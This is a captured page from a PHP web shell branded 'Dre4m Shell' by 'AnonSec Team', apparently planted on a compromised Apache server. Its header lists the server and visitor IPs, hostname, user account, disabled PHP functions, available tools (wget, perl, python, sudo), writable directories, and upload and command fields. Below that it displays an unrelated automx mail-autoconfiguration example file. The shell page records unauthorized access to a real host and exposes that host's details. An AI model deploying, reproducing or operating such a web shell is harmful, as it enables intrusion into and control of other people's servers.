Dre4m Shell
Server IP : 85.214.239.14  /  Your IP : 18.223.203.104
Web Server : Apache/2.4.61 (Debian)
System : Linux h2886529.stratoserver.net 4.9.0 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : www-data ( 33)
PHP Version : 7.4.18
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /srv/automx/automx-master/src/conf/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /srv/automx/automx-master/src/conf/automx.conf.example-complex
[automx]
provider = example.com
; debug = yes

# We care about any domain that we get a query for
domains = *


[DEFAULT]
action = settings

account_type = email
account_name = Foobar - ${cn}
account_name_short = Whatever you like

display_name = ${givenName} ${sn}

smtp = yes
smtp_server = mail.example.com
smtp_port = 587
smtp_encryption = starttls
smtp_auth = plaintext
smtp_auth_identity = ${deliverToAddress}
smtp_default = yes

imap = yes
imap_server = mail.example.com
imap_port = 143
imap_encryption = starttls
imap_auth = plaintext
imap_auth_identity = ${deliverToAddress}

pop = yes
pop_server = mail.example.com
pop_port = 110
pop_encryption = starttls
pop_auth = plaintext
pop_auth_identity = ${deliverToAddress}

host = ldap://primary.example.com, ldap://fallback1.example.com
base = ou=mail,ou=it,dc=example,dc=com
result_attrs = deliverToAddress, cn, givenName, sn
scope = sub
filter = (&(objectClass=*)(recipientAddress=%s))

bindmethod = sasl
saslmech = EXTERNAL
usetls = yes
reqcert = demand
cert = /etc/ssl/certs/yourservercert.pem
key = /etc/ssl/private/yourserverkey.pem
cacert = /etc/ssl/certs/yourca.pem


[global]
backend = ldap


[lululala.net]
backend = file
autodiscover = /var/www/automx/templates/autoconfig.xml

# More options are merged from global! And see, we do not provide a static
# XML file for the autoconfig service (in this example).


[foobar.org]
backend = filter
section_filter = filter.foobar.org

# You may nearly specify any command here. Even ssh remote command invocation
# was tested by the author. It works, as long as you get an emailaddress back.
filter.foobar.org = /bin/echo "%s"


[filter.foobar.org]
backend = sql
action = settings

# Just a sqlite3 example here!
host = sqlite:///var/www/yoursqlite3.db
query = SELECT displayname, mailaddr FROM mail WHERE mailaddr='%s';
result_attrs = displayname, mailaddr

display_name = ${displayname}

smtp = yes
smtp_server = mail.somewhere.org
smtp_port = 587
smtp_encryption = starttls
smtp_auth = plaintext
smtp_auth_identity = ${mailaddr}
smtp_default = yes

imap = yes
imap_server = mail.somewhere.org
imap_port = 143
imap_encryption = starttls
imap_auth = plaintext
imap_auth_identity = ${mailaddr}

pop = no

Anon7 - 2022
AnonSec Team